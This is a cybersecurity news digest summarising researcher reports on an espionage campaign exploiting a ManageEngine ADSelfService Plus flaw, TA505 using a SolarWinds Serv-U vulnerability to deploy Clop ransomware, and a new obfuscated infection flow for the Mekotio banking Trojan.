At a glance.
- Espionage campaign exploits ManageEngine ADSelfService Plus vulnerability.
- TA505 exploits SolarWinds Serv-U flaw to deploy ransomware.
- Mekotio banking Trojan uses new infection technique.
Espionage campaign exploits ManageEngine ADSelfService Plus vulnerability.
Researchers at Palo Alto Networks' Unit 42 describe a cyberespionage campaign that's exploiting a vulnerability in Zoho's ManageEngine ADSelfService Plus single-sign on (SSO) solution. The US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert concerning this vulnerability, CVE-2021-40539, in September 2021. CISA says the flaw is "an authentication bypass vulnerability affecting representational state transfer (REST) application programming interface (API) URLs that could enable remote code execution."
Unit 42 says that between September 22nd and early October "the actor successfully compromised at least nine global entities across the technology, defense, healthcare, energy, and education industries." The researchers haven't yet attributed the campaign to any particular threat actor, but they note similarities to previous campaigns by the Chinese APT APT27 or Emissary Panda. The threat actor is deploying the Godzilla web shell and the NGLite Trojan (both of which are publicly available), as well as a new credential stealer called "KdcSponge":
"Following initial exploitation, a payload was uploaded to the victim network which installed a Godzilla webshell. This activity was consistent across all victims; however, we also observed a smaller subset of compromised organizations who subsequently received a modified version of a new backdoor called NGLite. The threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on the network, while they exfiltrated files of interest simply by downloading them from the web server. Once the actors pivoted to a domain controller, they installed a new credential-stealing tool that we track as KdcSponge.
"Both Godzilla and NGLite were developed with Chinese instructions and are publicly available for download on GitHub. We believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks. Godzilla is a functionality-rich webshell that parses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response. This allows attackers to keep code likely to be flagged as malicious off the target system until they are ready to dynamically execute it."
TA505 exploits SolarWinds Serv-U vulnerability to deploy ransomware.
NCC Group researchers are tracking an uptick in Clop ransomware attacks leveraging a remote code execution vulnerability in SolarWinds Serv-U (CVE-2021-35211). The vulnerability was disclosed by Microsoft in July. NCC Group attributes these attacks to the cybercriminal actor TA505, noting, "We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach."
NCC Group advises that users update systems running SolarWinds Serv-U software to the most recent version. The researchers note that, as of October, 66.5% (2,784) of Serv-U instances around the world remained vulnerable.
Mekotio banking Trojan uses new infection technique.
Check Point has observed the Mekotio Latin American banking Trojan using a new infection flow. The researchers explain, "In the last 3 months, we saw approximately 100 attacks use new, simple obfuscation techniques, with the help of a substitution cipher, to hide the first module of the attack. This simple obfuscation technique allows it to go undetected by most of the AntiVirus products."
Check Point notes that some of the malware's operators were arrested in Spain earlier this year, but the primary gang appears to be active in Brazil:
"The new campaign started right after the Spanish Civil Guard announced the arrest of 16 people involved with Mekotio distribution in July 2021. It appears that the gang behind the malware were able to narrow the gap quickly and change tactics to avoid detection. We assume that the main cybercrime groups are operating from Brazil and they collaborated with Spanish gangs to distribute malware. The arrest stopped the activity of the Spanish gangs but not the main cybercrime groups."